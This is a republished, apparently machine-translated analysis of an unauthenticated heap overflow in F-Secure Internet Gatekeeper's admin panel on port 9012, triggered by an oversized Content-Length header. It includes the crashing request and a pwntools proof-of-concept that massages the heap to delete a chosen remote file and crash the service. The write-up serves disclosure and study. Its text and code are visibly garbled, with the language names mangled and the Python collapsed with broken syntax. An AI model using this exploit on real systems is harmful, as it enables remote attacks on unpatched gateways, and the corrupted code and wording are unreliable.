Shulou(Shulou.com)05/31 Report--

This article will explain in detail how to analyze the heap overflow vulnerabilities in F-Secure Internet Gatekeeper. The content of the article is of high quality, so the editor shares it for you as a reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.

Introduction of F-Secure Internet Gatekeeper heap overflow vulnerability

In this article, we will parse a heap overflow vulnerability in F-Secure Internet Gatekeeper applications and explain why a simple error leads to an exploitable unauthenticated remote code execution vulnerability.

Construction of vulnerability recurrence environment

In our experimental environment, all vulnerability reproduction and testing are carried out in a CentOS virtual machine, which is configured with at least 1 processor and 4GB RAM.

Next, download F-Secure Internet Gatekeeper

But now, manufacturers have removed products with loopholes.

The affected versions of the package SHA256 are as follows:

1582aa7782f78fcf01fccfe0b59f0a26b4a972020f9da860c19c1076a79c8e26

Installation steps:

1. If you are using the x64 version of CentOS, run the following command:

Yum install glibc.i686

2. Then, run the following command to install F-Secure Internet Gatekeeper

Rpm-I. rpm

3. To facilitate debugging, please install gdb 8 + and gef [click on me to download].

Now we can use GHIDRA/IDA or other disassembly / decompilation tools to reverse analyze F-Secure Internet Gatekeeper.

Loophole analysis

According to the information provided by F-Secure, F-Secure Internet Gatekeeper is an "efficient and easy to manage enterprise network gateway-level security solution".

F-Secure Internet Gatekeeper includes a control panel running on the 9012/tcp port that can be used to control all available services and rules in the product, such as HTTP agents, IMAP agents, and so on. This control panel can be accessed through the HTTP protocol, which is implemented by fsikgwebui programs developed in C language. In fact, the entire Web server has been developed with CumberCraft +, and some of the components use CivetWeb code, so we can assume that the server is likely to use a custom version of CivetWeb.

Since the server is developed by CCompact +, we can try to find out if there is a memory corruption vulnerability, because applications developed in this language often have this kind of security problem.

Here, we choose to use Fuzzotron to blur the administrator control panel. Fuzzotron is a powerful fuzzy testing tool, which uses Radamsa as the underlying engine driver and built-in TCP support to facilitate fuzzy testing of network services. For the test case, we chose a valid POST request to change the administrator control panel language settings, and unauthorized users can initiate the request, so it is very suitable for our test scenario.

When analyzing the mutated input samples of Radamsa, we can see that the vulnerability is related to Content-Length Header. The test case header value that caused the software crash is: Content-Length: 21487483844, which indicates that the overflow vulnerability is related to integer calculation errors.

After debugging the test case in gdb, we find that the code that caused the crash is in the fs_httpd_civetweb_callback_begin_request function, which is mainly responsible for handling the stack connection and forwards the request to the relevant function for further processing according to the HTTP request type, address path or Cookie.

During the recurrence of the vulnerability, we need to send a POST request to port 9012 used by the administrator control panel, where we set a very large Content-Length Header value:

POST / submit HTTP/1.1

Host: 192.168.0.24:9012

Content-Length: 21487483844

AAAAAAAAAAAAAAAAAAAAAAAAAAA

The target application parses the request and executes the fs_httpd_get_header function to get the Content-Length value. Next, the field value is passed to the strtoul function, which converts the string to an unsigned long integer for processing.

The pseudo code corresponding to the above control flow is as follows:

Content_len = fs_httpd_get_header (header_struct, "Content-Length")

If (content_len) {

Content_len_new = strtoul (content_len_old, 0,10)

}

The return value of the strtoul function is an unsigned long integer with a maximum value of 2 ^ 32-1 on a 32-bit system.

Because the Content-Length we provide is too long for unsigned long integers, the strtoul function returns a ULONG_ Max value (the original value overflows), so the corresponding value on a 32-bit system is 0xFFFFFFFF.

When the fs_httpd_civetweb_callback_begin_request function tries to execute a malloc request to allocate space for the data, it first adds 1 to the Content_Length variable, and then calls the malloc function.

The corresponding pseudo code is as follows:

/ / fs_malloc = = mallocdata_by_post_on_heap = fs_malloc (content_len_new + 1)

Because 0xFFFFFFFF + 1 will cause integer overflow, the final result is 0x00000000, resulting in malloc allocating memory space of 0 bytes.

When malloc (0) is called, the function returns a valid pointer to the heap, which points to the smallest chunk (size of 0x10 bytes).

After further analysis, we can see that the mg_read function is also called in the code:

/ / content_len_new is without the addition of 0x1.// so content_len_new = = 0xFFFFFFFFif (content_len_new) {int bytes_read = mg_read (header_struct, data_by_post_on_heap, content_len_new)}

After the overflow occurs, the above code will read any amount of data in the heap without any constraints, which is very convenient for vulnerability exploitation. At this point, we can stop writing data to the HTTP stream, and the target software will directly close the connection and continue with the operation flow. In this way, we have complete control over the data that needs to be written.

Exploit PoCfrom pwn import * import timeimport sysdef send_payload (payload, content_len=21487483844, nofun=False): r = remote (sys.argv [1]) 9012) r.send ("POST / HTTP/1.1\ n") r.send ("Host: 192.168.0.122 r.send 9012\ n") r.send ("Content-Length: {}\ n" .format (content_len)) r.send ("\ n") r.send (payload) if not nofun:r.send ("\ n\ n") return rdef trigger_exploit (): print "Triggering exploit" payload = "payload + =" A "* 12 # Padding payload + = p32 (0x1d) # Fast bin chunk overwrite payload + = "A" * 488 # Padding payload + = p32 (0xdda00771) # Address of payload payload + = p32 (0xdda00771+4) # Junk r = send_payload (payload) def massage_heap (filename): print "Trying to massage the heap." for x in xrange (100): payload = "" payload + = p32 (0x0) # Needed To bypass checks payload + = p32 (0x0) # Needed to bypass checks payload + = p32 (0xdda0077d) # Points to where the filename will be in memory payload + = filename + "\ x00" payload + = "C" * (0x300-len (payload)) r = send_payload (payload) Content_len=0x80000, nofun=True) r.close () cut_conn = Trueprint "Heap massage done" if _ _ name__ = "_ _ main__": if len (sys.argv)! = 3:print "Usage:. / {}" .format (sys.argv [0]) print "Run `export PWNLIB_SILENT= 1` for disabling verbose connections" exit () massage_heap (sys.argv [2]) time.sleep (1) trigger_exploit () print "Exploit finished. {} is now removed and remote process should be crashed ".format (sys.argv [2])

Vulnerability repair

The number assigned by F-Secure for this security issue is FSC-2019-3, which has been fixed by F-Secure in the v5.40-5.50 hotfix 8 (2019-07-11) version of F-Secure Internet Gatekeeper.

On how to carry out F-Secure Internet Gatekeeper heap overflow vulnerability analysis is shared here, I hope that the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.